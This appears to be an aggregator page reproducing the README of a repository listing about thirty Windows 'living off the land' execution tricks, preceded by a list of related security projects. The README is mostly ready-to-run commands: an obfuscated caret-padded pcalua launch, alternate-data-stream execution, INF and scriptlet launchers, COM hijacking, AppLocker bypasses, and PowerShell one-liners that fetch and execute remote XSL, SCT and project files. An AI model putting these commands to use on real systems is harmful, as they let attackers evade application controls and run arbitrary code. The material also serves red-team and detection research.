All Projects → homjxi0e → LOLBAS222

homjxi0e / LOLBAS222

Licence: other
APT || Execution || Launch || APTs || ( Authors harr0ey, bohops )

Projects that are alternatives of or similar to LOLBAS222

Apt
APT || Execution || Launch || APTs || ( Authors harr0ey, bohops )
Stars: ✭ 83 (-17%)
Mutual labels:  attack, apt, malware
Data
APTnotes data
Stars: ✭ 1,126 (+1026%)
Mutual labels:  apt, malware
mitre-visualizer
🧬 Mitre Interactive Network Graph (APTs, Malware, Tools, Techniques & Tactics)
Stars: ✭ 49 (-51%)
Mutual labels:  attack, malware
Windows-APT-Warfare
著作《Windows APT Warfare:惡意程式前線戰術指南》各章節技術實作之原始碼內容
Stars: ✭ 241 (+141%)
Mutual labels:  apt, malware
Awesome Cybersecurity Datasets
A curated list of amazingly awesome Cybersecurity datasets
Stars: ✭ 380 (+280%)
Mutual labels:  attack, malware
Wifiphisher
Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks. Wifiphisher can be further used to mount victim-customized web phishing attacks against the connected clients in order to capture credentials (e.g. from third party login pages or WPA/WPA2 Pre-Shared Keys) or infect the victim stations with malwares.
Stars: ✭ 10,333 (+10233%)
Mutual labels:  attack, malware
ThePhish
ThePhish: an automated phishing email analysis tool
Stars: ✭ 676 (+576%)
Mutual labels:  attack, malware
ddos
DDoS Attack & Protection Tools for Windows, Linux & Android
Stars: ✭ 84 (-16%)
Mutual labels:  attack
RayS
RayS: A Ray Searching Method for Hard-label Adversarial Attack (KDD2020)
Stars: ✭ 43 (-57%)
Mutual labels:  attack
Pummel
Socks5 Proxy HTTP/HTTPS-Flooding (cc) attack
Stars: ✭ 53 (-47%)
Mutual labels:  attack
maalik
Feature-rich Post Exploitation Framework with Network Pivoting capabilities.
Stars: ✭ 75 (-25%)
Mutual labels:  malware
CleanUnwantedUpdates
A set of scripts to detect updates of Microsoft (TM) Windows (TM) OS which harm users' privacy and uninstall them
Stars: ✭ 24 (-76%)
Mutual labels:  malware
ansible-apt
Ansible role to manage packages and up(date|grade)s in Debian-like systems
Stars: ✭ 21 (-79%)
Mutual labels:  apt
Spyware
Python-based spyware for Windows that logs the foreground window activites, keyboard inputs. Furthermore it is able to take screenshots and and run shell commands in the background.
Stars: ✭ 31 (-69%)
Mutual labels:  malware
ccapi
A header-only C++ library for interacting with crypto exchanges. Binding for Python is provided. A spot market making application is also provided as an end-to-end solution for liquidity providers.
Stars: ✭ 227 (+127%)
Mutual labels:  execution
Anti-Debug-DB
Anti-Debug encyclopedia contains methods used by malware to verify if they are executed under debugging. It includes the description of various anti-debug tricks, their implementation, and recommendations of how to mitigate the each trick.
Stars: ✭ 20 (-80%)
Mutual labels:  malware
decimation.github.io
Cydia repo
Stars: ✭ 18 (-82%)
Mutual labels:  apt
HIDAAF
Python - Human Interface Device Android Attack Framework
Stars: ✭ 31 (-69%)
Mutual labels:  attack
additional-hosts
🛡 List of categorized undesired hosts
Stars: ✭ 13 (-87%)
Mutual labels:  malware
chrome-crusader
Chrome Crusader
Stars: ✭ 24 (-76%)
Mutual labels:  malware

####################### | # | APT # | # #######################

( 1 ) Use Pcalua

p^c^a^l^u^a^ ^-^n^ ^-^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a calc.exe

( 2 ) Alternate Data Streams ADS:>

cmd.exe:> type C:\Users\Gihad\Desktop\file.bat > C:\Users\Gihad\Desktop\test.txt:x22x2
cmd.exe:> netsh exec C:\Users\Gihad\Desktop\test.txt:x22x2

( 3 ) pnputil.exe Launcher .INF:> Note This Eveything here .INF Work on My Script INFscript Only !

pnputil.exe /add-driver C:\FilesINFExecution.inf /install

&- My Code INFScript Injection Command Line 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 4 ) INFDefaultInstall Launch Execute INFScript

INFDefaultInstall.exe C:\INFPS.inf
&-  Code INFScript 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 5 ) setupapi.dll Launch Execute My INFScript

setupapi.dll,InstallHinfSection DefaultInstall 132 C:\INFPS.inf
&-  Code INFScript 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 6 ) DLL Execution Using ( Reflection ) In CPLEx AccessibilityCPL RegServer

&- Add Values in HKLM Name File ms-settings in Open/Shell/Command
&- rundll32 accessibilitycpl.dll,DllRegisterServer 
&- rundll32 shell32.dll,Control_RunDLL "C:\Windows\tem32\desk.cpl"

( 7 ) Language LUA in Files .wlua

wlua.exe C:\testing.wlua
&- Hello World Exe My Code LUA
https://gist.githubusercontent.com/homjxi0e/bbd218dea9bf63fd36524b9777a399f3/raw/888f7e484651fdb733d6261ca002d684a6e5bf9b/Test.wlua

( 8 ) SCT ScriptLet Execution in My INFScript

rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\INFPS.inf
&- Raw Code 
https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415

( 9 ) Jscript Execute Code Via ( Eval,VSA,)

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript')
$attack = 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")'
[Microsoft.JScript.Eval]::JScriptEvaluate($attack,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
&- Code Execute
https://gist.githubusercontent.com/homjxi0e/0d683007bd4a3ce39d3e19342aaa68ec/raw/4c8709382280de158b99dd78f91875e32a54bac4/ATPSJScript

( 10 ) MSI Launch Execution ( MsiExec.exe )

 msiexec.exe /passive /i C:\testing.msi /norestart 
 &- File MSI Hello World Exe in .MSI 

( 10v1 ) COM Component object Model Hijacking

&- Add Reg in System 
https://gist.githubusercontent.com/homjxi0e/8e42aa716361dc41b1c45a314bea501c/raw/327104671eebad1361210524f34076503e6b8e44/COM-hijacking.reg
&- You can now Execution invoke-CLSID Via xwizard.exe
xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}

( 10v2 ) Execute VBScript Via mshta.exe

&- Execute VBScript Code using mshta.exe
mshta.exe VBScript:Close(Execute("Set S=CreateObject(""WScript.Shell""):If S.AppActivate(""maybe-Run"")=False Then:S.Run(""C:\Windows\system32\Calc.exe""):End If"))
https://gist.githubusercontent.com/homjxi0e/eb16d75f3db6d6081648f2c5c5c98c3b/raw/0870f7553095dcf6519f93c1cf72c6415468140b/VBSExC

( 10v3 ) forfiles.exe Execution Endless

forfiles.exe /c calc.exe

( 10v4 ) Powershell Scriptlet COM Object Hijacking via System.Activator

$COMobj = [activator]::CreateInstance([type]::GetTypeFromCLSID("{00020000-0000-0000-C000-000000000046}"));$COMobj.Exec();
https://gist.github.com/homjxi0e/40f30c3be62c6ef152d6f6fffa9dba3c

( 10v5 ) ScriptRunner.exe Execution

ScriptRunner.exe -appvscript C:\Windows\System32\calc.exe

( 10v6 ) msdt.exe Execute EXE-MSI Via Reader XML wtih Launch by Pcwrun.exe

 msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
 &- link file PCW8E57.xml
 https://gist.github.com/homjxi0e/3f35212db81b9375b7906031a40c6d87

( 10v7 ) Launch MSI Pacakge Execution Powershell

install-Package C:\test.msi
https://github.com/homjxi0e/MSIScript/blob/master/Exec-Execute.msi

( 10v8 ) DLL Execute CML Launch Application

rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication calc.exe

( 10v9 ) HTA/MSI Execute Using OpenWith.exe

Whitelisting SRP Bypassing Using OpenWith.exe To Launch HTA/MSI Execution 
&- OpenWith.exe /c C:\test.hta 
&- OpenWith.exe /c C:\testing.msi

( 10v11 ) XrML Digital License (.xrm-ms) ActiveX

iexplorer C:\test.xrm-ms 
https://gist.github.com/homjxi0e/099d8f35f3b2e1b7daa7cbe366df1ed3
 

( 10v12 )

start C:\obj.url
https://gist.github.com/homjxi0e/0023a9cb5d4fee198019f87bd348effc

( 10 v13 ) ActiveX executing using a SVG Document

iexplorer C:\PoC.svg
https://gist.github.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0

(10v14) Dxcap.exe Abuse

Dxcap.exe -c C:\Windows\System32\notepad.exe    

(Note) Product Via @bohops ( 11 ) HTA Launch Execution ( url.dll )

Rundll32.exe url.dll,OpenURL FileHTA Or Anything 

( 12 ) SCT Launch Execution InSide INFScript ( ieadvpack.dll )

rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1, 

( 13 ) XML Launch Execution Via Reflection,Assembly Powershell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj); 
$e.build();

( 14 ) CSharp Launch Execution Via Reflection.Assembly Powershell

[Reflection.Assembly]::LoadWithPartialName('http://Microsoft.Build '); $e=new-object http://Microsoft.Build.Evaluation.Project('evil.csproj'); $e.Build();

( 15 ) SCT Execution Via INFScript By ( advpack.dll )

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

( 16 ) XML Launch Execution Via Reader XML,Transform Object Powershell

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

( 17 ) SCT Launch Execution Reflection.Assembly Via ( Microsoft.VisualBasic )

 [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …').Exec(0)

( 18 ) SCT Launch Execution Reflection.Assembly Via ( Microsoft.JScript )

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

( 19 ) Commandline APT Launch Execution Applocker/Bypassing Via ( CL_LoadAssembly )

import-module C:\windows\diagnostics\system\AERO\CL_LoadAssembly.ps1
LoadAssemblyFromPath C:\Windows\System32\calc.exe

( 20 ) HTA Launch Execution Via ( shdocvw.dll )

rundll32.exe shdocvw.dll, OpenURL <path to local URL file>

( 21 ) HTA Launch Execution Via ( ieframe.dll )

rundll32.exe ieframe.dll, OpenURL <path to local URL file>

( 22 ) Commandline Execute Via Vshadow.exe

 Vshadow exec calc.exe

( 23 ) CSharp Execution Via ProjectInstance RA Powershell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build')
$p="c:\test\test.csproj"
$e=new-object Microsoft.Build.Execution.ProjectInstance($p)
$e.build()
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].